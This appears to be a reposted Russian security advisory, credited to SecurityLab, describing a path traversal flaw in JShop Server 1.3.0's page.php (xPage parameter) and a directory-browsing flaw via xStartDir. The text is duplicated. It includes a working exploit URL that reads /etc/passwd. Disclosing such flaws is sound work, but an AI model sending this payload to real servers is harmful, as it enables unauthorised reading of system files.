просмотр файлов в JShop Server 1.3.0
Описание:
Скрипт page.php в параметре xPage не выполняет проверку, что
приводит к возможности чтения произвольных файлов
Эксплоит:
http://www.xxx.com/page.php?xPage=../../../../../etc/passwd
и еще одна проблема, авторизованный администратор может
просматривать директории других пользователей манипулируя запросами
в параметре xStartDir:
Пример:
http://www.jshopecommerce.com/jssdemo/admi...andID=548383890
http://www.jshopecommerce.com/jssdemo/admi...andID=548383890
:zns2: JShop E-Commerce
Источник: SecurityLab
Описание:
Скрипт page.php в параметре xPage не выполняет проверку, что
приводит к возможности чтения произвольных файлов
Эксплоит:
http://www.xxx.com/page.php?xPage=../../../../../etc/passwd
и еще одна проблема, авторизованный администратор может
просматривать директории других пользователей манипулируя запросами
в параметре xStartDir:
Пример:
http://www.jshopecommerce.com/jssdemo/admi...andID=548383890
http://www.jshopecommerce.com/jssdemo/admi...andID=548383890
:zns2: JShop E-Commerce
Источник: SecurityLab